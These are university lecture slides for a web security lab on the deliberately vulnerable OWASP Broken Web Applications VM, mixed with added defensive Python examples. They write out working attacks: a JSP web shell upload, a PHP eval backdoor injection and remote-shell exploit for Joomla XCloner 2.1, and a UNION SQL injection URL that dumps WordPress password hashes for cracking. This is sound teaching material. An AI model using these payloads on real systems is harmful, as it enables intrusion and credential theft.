Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection


Pattern Recognition and Applications Lab
Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection
Igino Corona, igino.corona _at_ diee.unica.it
Computer Security, May 2nd, 2017
Department of Electrical and Electronic Engineering, University of Cagliari, Italy

Practical session
We will focus on the most common integrity vulnerabilities that allow an attacker to convert data into code:
» A1-2013 Injection: SQL, code
» A3-2013 Cross-site Scripting (XSS): server-side, client-side, reflected, persistent
and on authentication vulnerabilities that allow an attacker to impersonate a user or collect confidential information.
Some real cases of well-known web services in production.

Practical session
OWASP Broken Web Applications Project: https://www.owasp.org/index.php/owasp_broken_web_applications_project
The VM can be downloaded from the following link: https://sourceforge.net/projects/owaspbwa/files/1.2/owasp_broken_web_apps_vm_1.2.ova/download

Practical Session: Integrity Vulnerabilities

A6-2010 Malicious File Execution
Targets: file (up)load routine of the web application
Interpreter: web application server (typically)
Insecure handling of external/uploaded files allows the attacker to convert input data into (arbitrary) application code.
[Diagram: HTTP(S) client (Flash, Silverlight, PDF Reader, images, JavaScript, CSS, HTML) -> HTTP(S) server ((up)load routine, application, database); the external file enters through the (up)load routine]

OWASP WebGoat
Very useful training application by OWASP. Let's exploit a malicious file execution vulnerability to get access to the webserver's filesystem!
User: root, Pwd: owaspbwa

OWASP WebGoat
From the left menu: Malicious Execution -> Malicious File Execution. The page allows one to upload/display (read) an image.

OWASP WebGoat
Let's use a tool like Live HTTP Headers (Firefox) to understand what the backend web application interpreter is. Our first guess is that there is a JavaServer Pages (JSP) interpreter.

OWASP WebGoat
In JSP (like PHP), programs are written within files that are read and interpreted at runtime: any file whose name ends with a specific extension (e.g., .jsp) is executed by the interpreter.
Key security question: does the application check the extension and content of the uploaded files?
Let's try to upload a file browser program written in JSP: http://www.vonloesch.de/files/browser.zip

OWASP WebGoat
Oh, we were able to upload the JSP file... Let's execute it (right click, view image).

OWASP WebGoat
Oh... The JSP file is actually executed and gives us a full-featured file browser with read/write permissions on the filesystem!
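The WebGoat lesson above turns on one question: does the upload handler check both the extension and the content of what it receives? The following is an added example (not code from the original slides or from WebGoat) of the server-side checks a defender would put in front of an image upload. It assumes the handler receives the client's filename and the raw bytes, and that validated files are written under upload_dir, a directory the web server neither serves directly nor hands to an interpreter, under a name the server picks itself.

```python
"""Added example (not from the original slides or WebGoat): server-side
validation for an image-upload handler. Assumptions: input is (client
filename, bytes); accepted files go under upload_dir, which is not served
or interpreted by the web server, under a server-chosen random name."""
import os
import secrets
import tempfile
from pathlib import Path

# Allowlist of what the image page is meant to accept. A denylist
# ("anything but .jsp") is the pattern that gets bypassed.
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}

# Leading bytes each image type must start with, checked regardless of the name.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

MAX_BYTES = 2 * 1024 * 1024  # assumed size limit


class UploadRejected(ValueError):
    """Raised when an upload fails validation."""


def check_upload(filename: str, data: bytes) -> str:
    """Validate name and content; return the accepted extension or raise."""
    if len(data) > MAX_BYTES:
        raise UploadRejected("file too large")
    # Keep only the last path component: directory parts are client-controlled.
    name = os.path.basename(filename.replace("\\", "/"))
    ext = Path(name).suffix.lower()
    if ext not in ALLOWED_EXT:
        raise UploadRejected(f"extension {ext!r} is not allowed")
    if not any(data.startswith(magic) for magic in MAGIC[ext]):
        raise UploadRejected("content does not match the declared image type")
    return ext


def is_accepted(filename: str, data: bytes) -> bool:
    """Boolean wrapper around check_upload, convenient for tests and logging."""
    try:
        check_upload(filename, data)
        return True
    except UploadRejected:
        return False


def store_upload(filename: str, data: bytes, upload_dir: str) -> str:
    """Validate, then write under a random server-chosen name; returns that name.
    The client's filename never reaches the disk, so names such as
    'browser.jsp;.png' or '../../x.gif' cannot choose the stored path."""
    ext = check_upload(filename, data)
    stored = secrets.token_hex(16) + ext
    with open(os.path.join(upload_dir, stored), "wb") as fh:
        fh.write(data)
    return stored


def demo_store():
    """Store a constructed GIF in a fresh temporary directory.
    Returns (stored name, whether the file exists on disk)."""
    upload_dir = tempfile.mkdtemp()
    name = store_upload("../../logo.gif", b"GIF89a" + b"\x00" * 8, upload_dir)
    return name, os.path.exists(os.path.join(upload_dir, name))
```

A text-only JSP file fails the magic-byte check whatever it is called, and a real image that carries code after a valid header cannot run either, because it is stored under a random image extension in a directory the interpreter never executes. Where an application can afford it, re-encoding the image through an image library before storing it removes such trailing payloads as well.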

Code Injection
Targets: web application routines
Interpreter: application server (typically)
An insecure separation between input data and code in web applications allows the attacker to inject (arbitrary) instructions.
[Diagram: HTTP(S) client (Flash, Silverlight, PDF Reader, JavaScript, images, CSS, HTML) -> HTTP(S) server (application, database)]

From Data to Application Code - Joomla
Let's play with Joomla

From Data to Application Code - Joomla
OK, it appears that Joomla has the plugin XCloner 2.1 installed

From Data to Application Code - Joomla
Let's find a suitable exploit

From Data to Application Code - Joomla: XCloner 2.1, OWASP Top 10 A1-2013
Found a command injection exploit for the plugin XCloner 2.1: https://www.exploit-db.com/exploits/16246/

Joomla XCloner 2.1 Command Injection
We may inject (stored in the configuration) arbitrary PHP code through the attribute output_url_pref and suitable values for task and output_path:
http://localhost/joomla/administrator/components/com_xclonerbackupandrestore/restore/xcloner.php?task=step2&output_url_pref=';+}+?>+<?php+eval($_get['lol']);+?>&output_path=../../../../
Then we can inject arbitrary commands through the malicious parameter lol, e.g., http://localhost/joomla/?lol=phpinfo();

Joomla XCloner 2.1 Remote Shell
There is also a more user-friendly implementation of the exploit that returns a remote shell!
    $ python 16246.py -t localhost -d /joomla/
    -----------------------------------------------------------------------------
    Joomla component (com_xcloner-backupandrestore) remote execution explo!t
    by mr_me - net-ninja.net
    ----------------------------------------------------
    (+) Targeting http://localhost/joomla/
    (!) Exploit working!
    (+) Droping to remote console (q for quit)
    user@localhost# ls
    CHANGELOG.php COPYRIGHT.php CREDITS.php
Nice! How does it work?
» injects the following malicious code in the config: '; }?> <?php eval(base64_decode($_cookie['lol']));?>
» sends a command through the lol cookie parameter: system( <shell string> )
» retrieves and displays the output
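The root cause in both XCloner slides is that a request parameter is written into a PHP source file as part of the program text, so a single quote ends the string literal and everything after it is code. The following added example (not from the original slides or from XCloner) shows that pattern in miniature, first as the vulnerable concatenation and then hardened by validating the value against an allowlist pattern and encoding it with the rules of a PHP single-quoted literal. The function names, the variable output_url_pref and the URL-prefix regex are illustrative assumptions; the sample payload is constructed, modelled on the slide's.

```python
"""Added example, not part of the original slides or of XCloner: a config
value written into PHP source, vulnerable and hardened. Names and the
URL-prefix policy below are assumptions for illustration."""
import re


def render_config_unsafe(output_url_pref: str) -> str:
    """Vulnerable: the raw value becomes part of the PHP program text, so a
    single quote ends the literal and what follows is executed as code."""
    return "<?php\n$output_url_pref = '" + output_url_pref + "';\n?>\n"


def php_single_quoted(value: str) -> str:
    """Encode a string as a PHP single-quoted literal. In that form only
    backslash and single quote are special, so escaping exactly those two
    keeps any content inside the literal, including '?>' and '<?php'."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


# Assumed policy: a URL prefix is a scheme, host, optional port and path; nothing else.
URL_PREFIX_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[A-Za-z0-9._~\-/]*)?")


def render_config_safe(output_url_pref: str) -> str:
    """Hardened: reject anything outside the allowlist pattern, then encode
    the value as a literal so it can only ever be data."""
    if not URL_PREFIX_RE.fullmatch(output_url_pref):
        raise ValueError("output_url_pref must be a plain URL prefix")
    return "<?php\n$output_url_pref = " + php_single_quoted(output_url_pref) + ";\n?>\n"


def safe_config_accepts(output_url_pref: str) -> bool:
    """True if the hardened renderer accepts the value."""
    try:
        render_config_safe(output_url_pref)
        return True
    except ValueError:
        return False


def php_open_tags(source: str) -> int:
    """Count '<?php' occurrences; a generated config should contain exactly one."""
    return source.count("<?php")


# Constructed sample value modelled on the slide's payload: it closes the
# literal, leaves PHP mode and opens a new PHP block.
SAMPLE_PAYLOAD = "'; ?> <?php phpinfo(); ?>"
```

The stronger fix is not to generate code from configuration at all: store settings as data (a JSON or INI file, or a database row) and read them back at runtime, so there is no program text for a value to break out of. When a PHP config file is unavoidable, the combination above, an allowlist check plus literal encoding, is the minimum; counting the `<?php` tags of the generated file, as `php_open_tags` does, is a cheap regression test for the pattern.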

A1-2013 SQL Injection
Targets: insecure API between web application and database
Interpreter: database backend
An insecure API between application and database allows the attacker to convert input data into (arbitrary) DB queries.
[Diagram: HTTP(S) client (Flash, Silverlight, PDF Reader, images, JavaScript, CSS, HTML) -> HTTP(S) server (application, DB access API, database)]

Wordpress
Let's play with Wordpress

Wordpress
OK, it appears that we are in front of WP 2.0 with the plugins Spreadsheet v0.6 and MyGallery 1.2.1 installed

Wordpress
Let's find a suitable exploit

Wordpress: OWASP Top 10 A1-2013
Found an SQL injection exploit for the plugin Spreadsheet v0.6: https://www.exploit-db.com/exploits/5486/

Wordpress
You may launch the exploit using your browser:
http://localhost/wordpress/wpcontent/plugins/wpss/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain
[Screenshot: the response displays the password hash]
NOTE: no errors on the DB side. Why? Because we injected the SQL query so that it generates one more row,
- containing exactly the expected number of columns (4 in this case)
- putting in the string field (n. 2) the char-separated (0x3a) concatenation of the desired info (user_login, user_pass, user_email)
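To make the two points of the slide concrete (the UNION works only when the column counts match, and it works at all only because ss_id is pasted into the query text), here is an added example that is not code from the original slides or from the Spreadsheet plugin. It reproduces the injection against a constructed in-memory SQLite database and puts the parameterized query next to it. The table and column names are invented (modelled on the wp_users table the slide queries), and the MySQL concat()/0x3a payload is rewritten with SQLite's || operator and a ':' literal.

```python
"""Added example, not from the original slides or the Spreadsheet plugin:
the slide's UNION injection against a constructed SQLite database, beside
the parameterized query that defeats it. Table/column names are invented;
the payload is the slide's, adapted to SQLite syntax."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build the constructed sample database (values are made up)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT, user_email TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$constructed-hash', 'admin@example.test');
        CREATE TABLE wpss_sheets (ss_id INTEGER, title TEXT, sheet_rows INTEGER, sheet_cols INTEGER);
        INSERT INTO wpss_sheets VALUES (1, 'Budget 2017', 10, 4);
    """)
    return conn


def load_sheet_unsafe(conn: sqlite3.Connection, ss_id: str) -> list:
    """Vulnerable: ss_id is pasted into the SQL text, so the request parameter
    can rewrite the query (the ss_load.php pattern the slide exploits)."""
    sql = f"SELECT ss_id, title, sheet_rows, sheet_cols FROM wpss_sheets WHERE ss_id={ss_id}"
    return conn.execute(sql).fetchall()


def load_sheet_safe(conn: sqlite3.Connection, ss_id: str) -> list:
    """Hardened: the parameter is typed first, then bound with a placeholder,
    so it reaches the database as a value and can never become SQL."""
    try:
        sheet_id = int(ss_id)
    except ValueError:
        raise ValueError("ss_id must be an integer") from None
    sql = "SELECT ss_id, title, sheet_rows, sheet_cols FROM wpss_sheets WHERE ss_id=?"
    return conn.execute(sql, (sheet_id,)).fetchall()


# The slide's payload, adapted to SQLite syntax (constructed). The injected
# SELECT has the same four columns as the original one, which is why the
# database raises no error and simply returns one extra row.
PAYLOAD = ("1 and (1=0) union select 1,"
           "user_login||':'||user_pass||':'||user_email,3,4 from wp_users--")


def safe_rejects(conn: sqlite3.Connection, ss_id: str) -> bool:
    """True if the hardened loader refuses the value."""
    try:
        load_sheet_safe(conn, ss_id)
        return False
    except ValueError:
        return True


def column_count_mismatch_raises(conn: sqlite3.Connection) -> bool:
    """Illustrates the slide's note: a UNION whose column count differs is a DB error."""
    try:
        load_sheet_unsafe(conn, "1 union select 1,2,3")
        return False
    except sqlite3.OperationalError:
        return True
```

Running `load_sheet_unsafe` with `PAYLOAD` returns the constructed admin row as if it were a spreadsheet, exactly the "one more row" the slide describes, while `load_sheet_safe` rejects the same input before any SQL is built. On the detection side, a numeric id parameter that suddenly contains `union`, `select` or a comment marker like `--` is the signature a web application firewall or request log review would flag; the durable fix remains the placeholder-bound query.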

Wordpress
Let's find out the password through brute force. We can use an online web service: https://crackstation.net. In a more realistic case, attackers may use offline tools such as John the Ripper: http://www.openwall.com/john/

Wordpress
Now that we have both username and password... The login URL for Wordpress is at /wp-login.php

Wordpress
We are in (with administrative privileges). The website is now 0wned by us. (the end)